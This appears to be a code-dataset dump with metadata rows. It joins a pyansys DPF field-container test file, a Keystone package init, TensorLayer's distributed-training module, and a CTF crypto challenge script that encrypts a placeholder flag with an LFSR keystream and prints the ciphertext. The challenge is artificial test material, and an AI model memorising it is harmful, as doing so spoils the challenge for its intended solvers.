assert mesh.elements.element_by_id(id).shape =="solid"
def test_el_shape_time_fc():
model = dpf.Model(examples.download_all_kinds_of_complexity_modal())
fc = model.results.stress.on_all_time_freqs.split_by_shape.eval()
assert isinstance(fc, ElShapeFieldsContainer)
assert len(fc.beam_fields())==45
assert len(fc.shell_fields())==45
assert len(fc.solid_fields())==45
assert len(fc.beam_fields(1))==1
assert len(fc.shell_fields(3))==1
assert len(fc.solid_fields(20))==1
mesh =model.metadata.meshed_region
f = fc.beam_field(3)
for id in f.scoping.ids :
assert mesh.elements.element_by_id(id).shape =="beam"
f = fc.shell_field(4)
for id in f.scoping.ids :
assert mesh.elements.element_by_id(id).shape =="shell"
f = fc.solid_field(5)
for id in f.scoping.ids :
assert mesh.elements.element_by_id(id).shape =="solid"
def test_mat_time_fc():
model = dpf.Model(examples.download_all_kinds_of_complexity_modal())
fc = model.results.stress.on_all_time_freqs.split_by_body.eval()
assert isinstance(fc, BodyFieldsContainer)
assert len(fc.get_fields_by_mat_id(45))==45
assert np.allclose(fc.get_fields_by_mat_id(45)[0].data,fc.get_field_by_mat_id(45,1).data)
assert len(fc.get_mat_scoping().ids)==32
def test_add_operator_fields_container():
field = dpf.fields_factory.create_3d_vector_field(2)
field.data = [0.,1.,2.,3.,4.,5.]
field.scoping.ids = [1,2]
fc = dpf.fields_container_factory.over_time_freq_fields_container([field,field])
#operator with field out
forward = ops.utility.forward_field(field)
add = fc+forward
assert isinstance(add, ops.math.add_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.array(field.data)*2.0)
#fc + list
add = fc+ [0.,1.,2.]
assert isinstance(add, ops.math.add_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,field.data + np.array([[0.,1.,2.],[0.,1.,2.]]))
#fc + float
add = fc+ 1.0
assert isinstance(add, ops.math.add_fc)
out = add.outputs.fields_container()
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data, np.array([[1., 2., 3.],[4., 5., 6.]]))
def test_minus_operator_fields_container():
field = dpf.fields_factory.create_3d_vector_field(2)
field.data = [0.,1.,2.,3.,4.,5.]
field.scoping.ids = [1,2]
fc = dpf.fields_container_factory.over_time_freq_fields_container([field,field])
#operator with field out
forward = ops.utility.forward_field(field)
add = fc-forward
assert isinstance(add, ops.math.minus_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.zeros((2,3)))
#fc - list
add = fc- [0.,1.,2.]
assert isinstance(add, ops.math.minus_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data, np.array([[0.,0.,0.],[3.,3.,3.]]))
#fc - float
add = fc- 1.0
assert isinstance(add, ops.math.minus_fc)
out = add.outputs.fields_container()
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data, np.array([[-1., 0., 1.],[2., 3., 4.]]))
def test_dot_operator_fields_container():
field = dpf.fields_factory.create_3d_vector_field(2)
field.data = [0.,1.,2.,3.,4.,5.]
field.scoping.ids = [1,2]
fc = dpf.fields_container_factory.over_time_freq_fields_container([field,field])
# fc * op
forward = ops.utility.forward_field(field)
add = fc*forward
assert isinstance(add, ops.math.generalized_inner_product_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.array([5.,50.]))
#fc * field
add = fc* field
assert isinstance(add, ops.math.generalized_inner_product_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.array([5.,50.]))
#fc * list
add = fc* [0.,1.,2.]
assert isinstance(add, ops.math.generalized_inner_product_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.array([5.,14.]))
#fc * float
add = fc* -1.0
assert isinstance(add, ops.math.generalized_inner_product_fc)
out = add.outputs.fields_container()
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data, -field.data)
def test_add_operator_server_fields_container():
field = dpf.fields_factory.create_3d_vector_field(2,server=local_server)
field.data = [0.,1.,2.,3.,4.,5.]
field.scoping.ids = [1,2]
fc = dpf.fields_container_factory.over_time_freq_fields_container([field,field],server=local_server)
#operator with field out
forward = ops.utility.forward_field(field,server=local_server)
add = fc+forward
assert isinstance(add, ops.math.add_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.array(field.data)*2.0)
#fc + list
add = fc+ [0.,1.,2.]
assert isinstance(add, ops.math.add_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,field.data + np.array([[0.,1.,2.],[0.,1.,2.]]))
#fc + float
add = fc+ 1.0
assert isinstance(add, ops.math.add_fc)
out = add.outputs.fields_container()
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data, np.array([[1., 2., 3.],[4., 5., 6.]]))
def test_minus_operator_server_fields_container():
field = dpf.fields_factory.create_3d_vector_field(2,server=local_server)
field.data = [0.,1.,2.,3.,4.,5.]
field.scoping.ids = [1,2]
fc = dpf.fields_container_factory.over_time_freq_fields_container([field,field], server=local_server)
#operator with field out
forward = ops.utility.forward_field(field, server=local_server)
add = fc-forward
assert isinstance(add, ops.math.minus_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.zeros((2,3)))
#fc - list
add = fc- [0.,1.,2.]
assert isinstance(add, ops.math.minus_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data, np.array([[0.,0.,0.],[3.,3.,3.]]))
#fc - float
add = fc- 1.0
assert isinstance(add, ops.math.minus_fc)
out = add.outputs.fields_container()
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data, np.array([[-1., 0., 1.],[2., 3., 4.]]))
def test_dot_operator_server_fields_container():
field = dpf.fields_factory.create_3d_vector_field(2, server=local_server)
field.data = [0.,1.,2.,3.,4.,5.]
field.scoping.ids = [1,2]
fc = dpf.fields_container_factory.over_time_freq_fields_container([field,field], server=local_server)
# fc * op
forward = ops.utility.forward_field(field, server=local_server)
add = fc*forward
assert isinstance(add, ops.math.generalized_inner_product_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.array([5.,50.]))
#fc * field
add = fc* field
assert isinstance(add, ops.math.generalized_inner_product_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.array([5.,50.]))
#fc * list
add = fc* [0.,1.,2.]
assert isinstance(add, ops.math.generalized_inner_product_fc)
out = add.outputs.fields_container()
assert len(out)==2
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data,np.array([5.,14.]))
#fc * float
add = fc* -1.0
assert isinstance(add, ops.math.generalized_inner_product_fc)
out = add.outputs.fields_container()
assert out[0].scoping.ids == [1,2]
assert np.allclose(out[0].data, -field.data)
if __name__ == "__main__":
test_add_field_by_time_id()
| 33.665552
| 105
| 0.646185
|
fddc8d79e6a742b2b559bb9ca8edcc2325b22383
| 610
|
py
|
Python
|
keystone/credential/providers/fernet/__init__.py
|
ferag/keystone
|
af1c1a822a8dfdd543c6e4d48264f5b8be2bdfc7
|
[
"Apache-2.0"
] | 615
|
2015-01-07T12:32:52.000Z
|
2022-03-24T03:49:47.000Z
|
keystone/credential/providers/fernet/__init__.py
|
ferag/keystone
|
af1c1a822a8dfdd543c6e4d48264f5b8be2bdfc7
|
[
"Apache-2.0"
] | 11
|
2015-04-13T18:52:40.000Z
|
2021-08-21T06:13:05.000Z
|
keystone/credential/providers/fernet/__init__.py
|
ferag/keystone
|
af1c1a822a8dfdd543c6e4d48264f5b8be2bdfc7
|
[
"Apache-2.0"
] | 696
|
2015-01-15T00:31:07.000Z
|
2022-03-16T09:56:00.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystone.credential.providers.fernet.core import * # noqa
| 43.571429
| 75
| 0.765574
|
1166bfe06093ad6ba7cbd527909bbd8e5e1ec81e
| 716
|
py
|
Python
|
Gathered CTF writeups/ptr-yudai-writeups/2019/ISITDTU_CTF_2019_Quals/decrypt_to_me/task.py
|
mihaid-b/CyberSakura
|
f60e6b6bfd6898c69b84424b080090ae98f8076c
|
[
"MIT"
] | 1
|
2022-03-27T06:00:41.000Z
|
2022-03-27T06:00:41.000Z
|
Gathered CTF writeups/ptr-yudai-writeups/2019/ISITDTU_CTF_2019_Quals/decrypt_to_me/task.py
|
mihaid-b/CyberSakura
|
f60e6b6bfd6898c69b84424b080090ae98f8076c
|
[
"MIT"
] | null | null | null |
Gathered CTF writeups/ptr-yudai-writeups/2019/ISITDTU_CTF_2019_Quals/decrypt_to_me/task.py
|
mihaid-b/CyberSakura
|
f60e6b6bfd6898c69b84424b080090ae98f8076c
|
[
"MIT"
] | 1
|
2022-03-27T06:01:42.000Z
|
2022-03-27T06:01:42.000Z
|
import binascii
def generate_prg_bit(n):
state = n
while True:
last_bit = state & 1
yield last_bit
middle_bit = state >> len(bin(n)[2:])//2 & 1
state = (state >> 1) | ((last_bit ^ middle_bit) << (len(bin(n)[2:])-1))
flag = '###########'
enc = "OKQI+f9R+tHEJJGcfko7Ahy2AuL9c8hgtYT2k9Ig0QyXUvsj1B9VIGUZVPAP2EVD8VmJBZbF9e17"
flag_bin_text = bin(int(binascii.hexlify(flag), 16))[2:]
prg = generate_prg_bit(len(flag_bin_text))
ctext = []
flag_bits = [int(i) for i in flag_bin_text]
for i in range(len(flag_bits)):
ctext.append(flag_bits[i] ^ next(prg))
ciphertext = '0b' + ''.join(map(str, ctext))
n = int(ciphertext, 2)
print binascii.unhexlify('%x' % n).encode('base64')
| 34.095238
| 84
| 0.645251
|
544aac87e697b5d888dd6a4cf7e9e633b1d66a5d
| 24,184
|
py
|
Python
|
tensorlayer/distributed.py
|
Windaway/tensorlayer
|
7afd8f0a39a4f1864a82e508f7a326fc998dc033
|
[
"Apache-2.0"
] | 1
|
2019-05-16T13:27:57.000Z
|
2019-05-16T13:27:57.000Z
|
tensorlayer/distributed.py
|
Helilysyt/tensorlayer
|
2dc4482a13aff3833a246b4d85b69a5d9079f01d
|
[
"Apache-2.0"
] | null | null | null |
tensorlayer/distributed.py
|
Helilysyt/tensorlayer
|
2dc4482a13aff3833a246b4d85b69a5d9079f01d
|
[
"Apache-2.0"
] | 1
|
2021-04-13T06:34:48.000Z
|
2021-04-13T06:34:48.000Z
|
# -*- coding: utf-8 -*-
import json
import os
import time
import tensorflow as tf
from tensorflow.python.training import session_run_hook
from tensorlayer import logging
from tensorlayer.decorators import deprecated
from tensorlayer.lazy_imports import LazyImport
hvd = LazyImport('horovod.tensorflow')
__all__ = ['TaskSpecDef', 'TaskSpec', 'DistributedSession', 'StopAtTimeHook', 'LoadCheckpoint', 'Trainer']
class Trainer(object):
"""Trainer for neural networks in a distributed environment.
TensorLayer Trainer is a high-level training interface built on top of TensorFlow MonitoredSession and
`Horovod <https://github.com/uber/horovod>`__. It transparently scales the training of a TensorLayer model
    from a single GPU to multiple GPUs that can be placed on different machines in a single cluster.
To run the trainer, you will need to install Horovod on your machine. Check the installation script at
`tensorlayer/scripts/download_and_install_openmpi3_ubuntu.sh`
The minimal inputs to the Trainer include (1) a training dataset defined using the TensorFlow DataSet API,
and (2) a model build function given the inputs of the training dataset, and returns the neural network
    to train, the loss function to minimize, and the names of the tensors to log during training, and (3)
an optimizer and its arguments.
The default parameter choices of Trainer is inspired by the Facebook paper:
`Accurate, Large Minibatch SGD: Training ImageNet in 1 Hour <https://arxiv.org/abs/1706.02677>`__
Parameters
----------
training_dataset : class TensorFlow ``DataSet``
The training dataset which zips samples and labels. The trainer automatically
shards the training dataset based on the number of GPUs.
build_training_func : function
A function that builds the training operator. It takes the training dataset as an input,
and returns the neural network, the loss function and a dictionary that maps
string tags to tensors to log during training.
optimizer : class TensorFlow ``Optimizer``
        The loss function optimizer. The trainer automatically scales the learning rate linearly based on
the number of GPUs.
optimizer_args : dict
The optimizer argument dictionary. It must contain a `learning_rate` field in type of float.
Note that the learning rate is linearly scaled according to the number of GPU by default.
You can disable it using the option `scaling_learning_rate`
batch_size : int
The training mini-batch size (i.e., number of samples per batch).
prefetch_size: int or None
The dataset prefetch buffer size. Set this parameter to overlap the GPU training and data preparation
if the data preparation is heavy.
checkpoint_dir : None or str
        The path to the TensorFlow model checkpoint. Note that only the trainer master checkpoints its model.
If None, checkpoint is disabled.
log_step_size : int
The trainer logs training information every N mini-batches (i.e., step size).
validation_dataset: None or class TensorFlow ``DataSet``
The optional validation dataset that zips samples and labels. Note that
        only the trainer master typically needs to run the validation.
build_validation_func: None or function
The function that builds the validation operator. It returns the validation neural network (which
        shares the weights of the training network) and a custom number of validation metrics.
scaling_learning_rate: Boolean
Linearly scale the learning rate by the number of GPUs. Default is True.
        This `linear scaling rule` is generally effective and is highly recommended by practitioners.
Check `Accurate, Large Minibatch SGD: Training ImageNet in 1 Hour <https://arxiv.org/abs/1706.02677>`__
max_iteration: int
The maximum iteration (i.e., mini-batch) to train.
The default is `math.inf`. You can set it to a small number to end the training earlier. This is
        usually set for testing purposes.
Attributes
----------
training_network : class TensorLayer ``Layer``
The training model.
session : class TensorFlow ``MonitoredTrainingSession``
        The training session that the Trainer wraps.
global_step : int
        The number of training mini-batches run so far.
validation_metrics : list of tuples
        The validation metrics, given as pairs of the validation metric tensor and its average value.
Examples
--------
See `tutorial_mnist_distributed_trainer.py
<https://github.com/tensorlayer/tensorlayer/blob/master/example/tutorial_mnist_distributed_trainer.py>`__.
"""
def __init__(
self, training_dataset, build_training_func, optimizer, optimizer_args, batch_size=32, prefetch_size=None,
checkpoint_dir=None, scaling_learning_rate=True, log_step_size=1, validation_dataset=None,
build_validation_func=None, max_iteration=float('inf')
):
# Initialize Horovod.
hvd.init()
self.is_master = hvd.rank() == 0
self._last_global_step = 0
if prefetch_size is None:
prefetch_size = batch_size
# Define the loss for validation dataset
if validation_dataset:
validation_dataset = validation_dataset.shard(num_shards=hvd.size(), index=hvd.rank()).batch(batch_size)
            validation_dataset = validation_dataset.prefetch(buffer_size=prefetch_size)  # prefetch returns a new dataset
self._validation_iterator = validation_dataset.make_initializable_iterator()
next_example, next_label = self._validation_iterator.get_next()
_, self._validation_metrics = build_validation_func(next_example, next_label)
if not isinstance(self._validation_metrics, list):
self._validation_metrics = list(self._validation_metrics)
else:
self._validation_iterator = None
self._validation_metrics = None
# Get the shard of the dataset based on my local rank
training_dataset = training_dataset.shard(num_shards=hvd.size(), index=hvd.rank()).batch(batch_size)
        training_dataset = training_dataset.prefetch(buffer_size=prefetch_size)  # prefetch returns a new dataset
training_iterator = training_dataset.make_one_shot_iterator()
self._training_network, loss, log_tensors = build_training_func(*training_iterator.get_next())
# Adjust learning rate based on number of GPUs.
lr = optimizer_args['learning_rate']
optimizer_args['learning_rate'] = lr * hvd.size() if scaling_learning_rate else lr
opt = optimizer(**optimizer_args)
# Add Horovod Distributed Optimizer.
opt = hvd.DistributedOptimizer(opt)
self._global_step = tf.train.get_or_create_global_step()
if isinstance(log_tensors, list):
log_tensors.append(self._global_step)
else:
log_tensors['global_step'] = self._global_step
self._train_op = opt.minimize(loss, global_step=self._global_step)
hooks = [
# Horovod: BroadcastGlobalVariablesHook broadcasts initial variable states
# from rank 0 to all other processes. This is necessary to ensure consistent
# initialization of all workers when training is started with random weights
# or restored from a checkpoint.
hvd.BroadcastGlobalVariablesHook(0),
# Horovod: adjust number of steps based on number of GPUs.
tf.train.StopAtStepHook(last_step=max_iteration // hvd.size()),
tf.train.LoggingTensorHook(tensors=log_tensors, every_n_iter=log_step_size),
]
# Pin GPU to be used to process local rank (one GPU per process)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.gpu_options.visible_device_list = str(hvd.local_rank())
# Save checkpoints only on worker 0 to prevent other workers from
# corrupting them.
checkpoint_dir = checkpoint_dir if self.is_master else None
# The MonitoredTrainingSession takes care of session initialization,
# restoring from a checkpoint, saving to a checkpoint, and closing when done
# or an error occurs.
self._sess = tf.train.MonitoredTrainingSession(checkpoint_dir=checkpoint_dir, hooks=hooks, config=config)
@property
def global_step(self):
if self._sess.should_stop():
return self._last_global_step
self._last_global_step = self._sess.run(self._global_step)
return self._last_global_step
@property
def session(self):
return self._sess
@property
def training_network(self):
return self._training_network
@property
def validation_metrics(self):
"""A helper function to compute validation related metrics"""
if (self._validation_iterator is None) or (self._validation_metrics is None):
raise AttributeError('Validation is not setup.')
n = 0.0
metric_sums = [0.0] * len(self._validation_metrics)
self._sess.run(self._validation_iterator.initializer)
while True:
try:
metrics = self._sess.run(self._validation_metrics)
for i, m in enumerate(metrics):
metric_sums[i] += m
n += 1.0
except tf.errors.OutOfRangeError:
break
for i, m in enumerate(metric_sums):
metric_sums[i] = metric_sums[i] / n
return zip(self._validation_metrics, metric_sums)
def train_on_batch(self):
"""Train a mini-batch."""
self._sess.run(self._train_op)
def train_and_validate_to_end(self, validate_step_size=50):
"""A helper function that shows how to train and validate a model at the same time.
Parameters
----------
validate_step_size : int
Validate the training network every N steps.
"""
while not self._sess.should_stop():
self.train_on_batch() # Run a training step synchronously.
if self.global_step % validate_step_size == 0:
# logging.info("Average loss for validation dataset: %s" % self.get_validation_metrics())
log_str = 'step: %d, ' % self.global_step
for n, m in self.validation_metrics:
log_str += '%s: %f, ' % (n.name, m)
logging.info(log_str)
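# --- Added illustration (not part of the original module) ---
# A hedged sketch of driving the Horovod-based trainer defined above, assuming
# it is exposed under the name `Trainer` and that `make_dataset` and
# `build_model` are user-supplied callables. The optimizer choice and the
# hyper-parameters below are placeholders, not recommendations.
# Launch with e.g. `horovodrun -np 4 python train_script.py`.
def _example_horovod_training(Trainer, make_dataset, build_model):
    trainer = Trainer(
        training_dataset=make_dataset('train'),
        validation_dataset=make_dataset('val'),
        build_training_func=build_model,
        build_validation_func=build_model,
        optimizer=tf.train.AdamOptimizer,
        optimizer_args={'learning_rate': 1e-3},
        batch_size=32,
        log_step_size=100,
    )
    # Train to completion, reporting the validation metrics every 50 steps.
    trainer.train_and_validate_to_end(validate_step_size=50)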
@deprecated(date="2018-10-30", instructions="Using the TensorLayer distributed trainer.")
class TaskSpecDef(object):
"""Specification for a distributed task.
It contains the job name, index of the task,
the parameter servers and the worker servers. If you want to use the last worker
for continuous evaluation you can call the method `use_last_worker_as_evaluator`
which returns a new :class:`TaskSpecDef` object without the last worker in the
cluster specification.
Parameters
----------
task_type : str
Task type. One of `master`, `worker` or `ps`.
index : int
The zero-based index of the task. Distributed training jobs will have a single
master task, one or more parameter servers, and one or more workers.
trial : int
The identifier of the trial being run.
ps_hosts : str OR list of str
        A string with a comma-separated list of hosts for the parameter servers
        or a list of hosts.
    worker_hosts : str OR list of str
        A string with a comma-separated list of hosts for the worker servers
        or a list of hosts.
master : str
A string with the master hosts
Notes
----------
master might not be included in TF_CONFIG and can be None. The shard_index is adjusted
in any case to assign 0 to master and >= 1 to workers.
    This implementation doesn't support sparse arrays in the `TF_CONFIG` variable, as
    shown in the official TensorFlow documentation, because they are not supported by
    the JSON definition.
References
----------
- `ML-engine trainer considerations <https://cloud.google.com/ml-engine/docs/trainer-considerations#use_tf_config>`__
"""
def __init__(self, task_type='master', index=0, trial=None, ps_hosts=None, worker_hosts=None, master=None):
self.type = task_type
self._index = int(index)
self._cluster_spec = None
self.num_workers = 1
self.num_ps = 0
self.shard_index = int(index)
self._master = True
self.trial = trial
self.ps_hosts = ps_hosts
self.worker_hosts = worker_hosts
self.master = master
self._server = None
if ps_hosts and worker_hosts:
self.ps_hosts = ps_hosts if isinstance(ps_hosts, list) else ps_hosts.split(',')
self.num_ps = len(self.ps_hosts)
self.worker_hosts = worker_hosts if isinstance(worker_hosts, list) else worker_hosts.split(',')
if master is not None and len(master) > 0:
self._cluster_spec = tf.train.ClusterSpec(
{
'ps': self.ps_hosts,
'worker': self.worker_hosts,
'master': master
}
)
# master is a worker too
self.num_workers = len(self.worker_hosts) + 1
if self.type == 'worker':
self.shard_index = self._index + 1
self._master = self.type == 'master'
else:
self._cluster_spec = tf.train.ClusterSpec({'ps': self.ps_hosts, 'worker': self.worker_hosts})
self.num_workers = len(self.worker_hosts)
if self.type == 'worker':
self.shard_index = self._index
self._master = self.type == 'worker' and self._index == 0
def is_ps(self):
"""Returns true if this server is a parameter server"""
return self.type == 'ps'
def is_worker(self):
"""Returns true if this server is a worker server"""
return self.type == 'worker'
def is_master(self):
"""Returns true if this server is the master server"""
return self._master
def is_evaluator(self):
"""Returns true if this server is the evaluator server"""
return self.type == 'worker' and self.num_workers == self._index
def device_fn(self):
"""Returns the function with the specification to create the graph in this server"""
current_device = '/job:{}/task:{}'.format(self.type, self._index)
ps_devices = '/job:ps'
return tf.train.replica_device_setter(
ps_device=ps_devices, worker_device=current_device, cluster=self._cluster_spec
)
def create_server(self):
if self._server is None and self.ps_hosts and self.worker_hosts and not self.is_evaluator():
# create server and join if it is a parameter server
self._server = tf.train.Server(self._cluster_spec, job_name=self.type, task_index=self._index)
if self.is_ps():
self._server.join()
def target(self):
if self._server is None:
self.create_server()
if self._server is not None:
return self._server.target
else:
return None
def use_last_worker_as_evaluator(self):
"""Returns a new :class:`TaskSpecDef` where the last worker has been removed from
the list of worker_hosts, so it is not used for training anymore. You can call
is_evaluator to know whether this server is the evaluator one or not.
In case there is only one server for training this method raises an exception, as
you cannot use any server for evaluation.
"""
if self.num_workers <= 1:
raise Exception('You need more than one worker instance to use one as evaluator')
return TaskSpecDef(
task_type=self.type, index=self._index, trial=self.trial, ps_hosts=self.ps_hosts,
worker_hosts=self.worker_hosts[:-1], master=self.master
)
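# --- Added illustration (not part of the original module) ---
# A hedged sketch of building a TaskSpecDef by hand (host names are made up)
# and reserving the last worker for continuous evaluation, as described in the
# class docstring above.
def _example_task_spec():
    spec = TaskSpecDef(
        task_type='worker', index=1,
        ps_hosts='ps0:2222,ps1:2222',
        worker_hosts='worker0:2222,worker1:2222,worker2:2222',
    )
    if spec.num_workers > 1:
        spec = spec.use_last_worker_as_evaluator()
    # device_fn() returns the replica device setter for this task.
    return spec.is_evaluator(), spec.device_fn()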
@deprecated(date="2018-10-30", instructions="Using the TensorLayer distributed trainer.")
def create_task_spec_def():
    """Returns a :class:`TaskSpecDef` based on the environment variables for distributed training.
References
----------
- `ML-engine trainer considerations <https://cloud.google.com/ml-engine/docs/trainer-considerations#use_tf_config>`__
- `TensorPort Distributed Computing <https://www.tensorport.com/documentation/code-details/>`__
"""
if 'TF_CONFIG' in os.environ:
# TF_CONFIG is used in ML-engine
env = json.loads(os.environ.get('TF_CONFIG', '{}'))
task_data = env.get('task', None) or {'type': 'master', 'index': 0}
cluster_data = env.get('cluster', None) or {'ps': None, 'worker': None, 'master': None}
return TaskSpecDef(
task_type=task_data['type'], index=task_data['index'],
trial=task_data['trial'] if 'trial' in task_data else None, ps_hosts=cluster_data['ps'],
worker_hosts=cluster_data['worker'], master=cluster_data['master'] if 'master' in cluster_data else None
)
elif 'JOB_NAME' in os.environ:
# JOB_NAME, TASK_INDEX, PS_HOSTS, WORKER_HOSTS and MASTER_HOST are used in TensorPort
return TaskSpecDef(
task_type=os.environ['JOB_NAME'], index=os.environ['TASK_INDEX'], ps_hosts=os.environ.get('PS_HOSTS', None),
worker_hosts=os.environ.get('WORKER_HOSTS', None), master=os.environ.get('MASTER_HOST', None)
)
else:
raise Exception('You need to setup TF_CONFIG or JOB_NAME to define the task.')
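# --- Added illustration (not part of the original module) ---
# A minimal TF_CONFIG payload that create_task_spec_def() above would accept;
# the host names are placeholders. Setting the variable is shown commented out
# so that importing this module stays side-effect free.
_EXAMPLE_TF_CONFIG = json.dumps({
    'task': {'type': 'worker', 'index': 0},
    'cluster': {
        'ps': ['ps0:2222'],
        'worker': ['worker0:2222', 'worker1:2222'],
        'master': ['master0:2222'],
    },
})
# os.environ['TF_CONFIG'] = _EXAMPLE_TF_CONFIG
# task_spec = create_task_spec_def()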
@deprecated(date="2018-10-30", instructions="Using the TensorLayer distributed trainer.")
def create_distributed_session(
task_spec=None, checkpoint_dir=None, scaffold=None, hooks=None, chief_only_hooks=None, save_checkpoint_secs=600,
save_summaries_steps=object(), save_summaries_secs=object(), config=None, stop_grace_period_secs=120,
log_step_count_steps=100
):
"""Creates a distributed session.
It calls `MonitoredTrainingSession` to create a :class:`MonitoredSession` for distributed training.
Parameters
----------
task_spec : :class:`TaskSpecDef`.
The task spec definition from create_task_spec_def()
checkpoint_dir : str.
Optional path to a directory where to restore variables.
scaffold : ``Scaffold``
A `Scaffold` used for gathering or building supportive ops.
If not specified, a default one is created. It's used to finalize the graph.
hooks : list of ``SessionRunHook`` objects.
Optional
chief_only_hooks : list of ``SessionRunHook`` objects.
Activate these hooks if `is_chief==True`, ignore otherwise.
save_checkpoint_secs : int
The frequency, in seconds, that a checkpoint is saved
using a default checkpoint saver. If `save_checkpoint_secs` is set to
`None`, then the default checkpoint saver isn't used.
save_summaries_steps : int
The frequency, in number of global steps, that the
summaries are written to disk using a default summary saver. If both
`save_summaries_steps` and `save_summaries_secs` are set to `None`, then
the default summary saver isn't used. Default 100.
save_summaries_secs : int
The frequency, in secs, that the summaries are written
to disk using a default summary saver. If both `save_summaries_steps` and
`save_summaries_secs` are set to `None`, then the default summary saver
isn't used. Default not enabled.
config : ``tf.ConfigProto``
an instance of `tf.ConfigProto` proto used to configure the session.
It's the `config` argument of constructor of `tf.Session`.
stop_grace_period_secs : int
Number of seconds given to threads to stop after
`close()` has been called.
log_step_count_steps : int
The frequency, in number of global steps, that the
global step/sec is logged.
Examples
--------
A simple example for distributed training where all the workers use the same dataset:
>>> task_spec = TaskSpec()
>>> with tf.device(task_spec.device_fn()):
>>> tensors = create_graph()
>>> with tl.DistributedSession(task_spec=task_spec,
... checkpoint_dir='/tmp/ckpt') as session:
>>> while not session.should_stop():
>>> session.run(tensors)
An example where the dataset is shared among the workers
(see https://www.tensorflow.org/programmers_guide/datasets):
>>> task_spec = TaskSpec()
>>> # dataset is a :class:`tf.data.Dataset` with the raw data
>>> dataset = create_dataset()
>>> if task_spec is not None:
>>> dataset = dataset.shard(task_spec.num_workers, task_spec.shard_index)
>>> # shuffle or apply a map function to the new sharded dataset, for example:
>>> dataset = dataset.shuffle(buffer_size=10000)
>>> dataset = dataset.batch(batch_size)
>>> dataset = dataset.repeat(num_epochs)
>>> # create the iterator for the dataset and the input tensor
>>> iterator = dataset.make_one_shot_iterator()
>>> next_element = iterator.get_next()
>>> with tf.device(task_spec.device_fn()):
>>> # next_element is the input for the graph
>>> tensors = create_graph(next_element)
>>> with tl.DistributedSession(task_spec=task_spec,
... checkpoint_dir='/tmp/ckpt') as session:
>>> while not session.should_stop():
>>> session.run(tensors)
References
----------
- `MonitoredTrainingSession <https://www.tensorflow.org/api_docs/python/tf/train/MonitoredTrainingSession>`__
"""
target = task_spec.target() if task_spec is not None else None
is_chief = task_spec.is_master() if task_spec is not None else True
return tf.train.MonitoredTrainingSession(
master=target, is_chief=is_chief, checkpoint_dir=checkpoint_dir, scaffold=scaffold,
save_checkpoint_secs=save_checkpoint_secs, save_summaries_steps=save_summaries_steps,
save_summaries_secs=save_summaries_secs, log_step_count_steps=log_step_count_steps,
stop_grace_period_secs=stop_grace_period_secs, config=config, hooks=hooks, chief_only_hooks=chief_only_hooks
)
@deprecated(date="2018-10-30", instructions="Using the TensorLayer distributed trainer.")
class StopAtTimeHook(session_run_hook.SessionRunHook):
"""Hook that requests stop after a specified time.
Parameters
----------
time_running: int
Maximum time running in seconds
"""
def __init__(self, time_running):
self._time_running = time_running
self._end_time = 0
def begin(self):
self._end_time = time.time() + self._time_running
def after_run(self, run_context, run_values):
if time.time() > self._end_time:
run_context.request_stop()
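# --- Added illustration (not part of the original module) ---
# A hedged usage sketch: stop a monitored training session after roughly one
# hour of wall-clock time. `train_op` is a placeholder for the caller's op.
def _example_stop_after_one_hour(train_op):
    with tf.train.MonitoredTrainingSession(hooks=[StopAtTimeHook(3600)]) as sess:
        while not sess.should_stop():
            sess.run(train_op)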
@deprecated(date="2018-10-30", instructions="Using the TensorLayer distributed trainer.")
class LoadCheckpoint(session_run_hook.SessionRunHook):
"""Hook that loads a checkpoint after the session is created.
>>> from tensorflow.python.ops import variables as tf_variables
>>> from tensorflow.python.training.monitored_session import SingularMonitoredSession
>>>
>>> tensors = create_graph()
>>> saver = tf.train.Saver(var_list=tf_variables.trainable_variables())
>>> checkpoint_hook = LoadCheckpoint(saver, my_checkpoint_file)
>>> with tf.SingularMonitoredSession(hooks=[checkpoint_hook]) as session:
>>> while not session.should_stop():
>>> session.run(tensors)
"""
def __init__(self, saver, checkpoint):
self._saver = saver
self._checkpoint = checkpoint
self._loaded = False
def after_create_session(self, session, coord):
if not self._loaded:
self._loaded = True
            self._saver.restore(session, self._checkpoint)
# Alias
TaskSpec = create_task_spec_def
DistributedSession = create_distributed_session
| 44.29304 | 121 | 0.673627 |
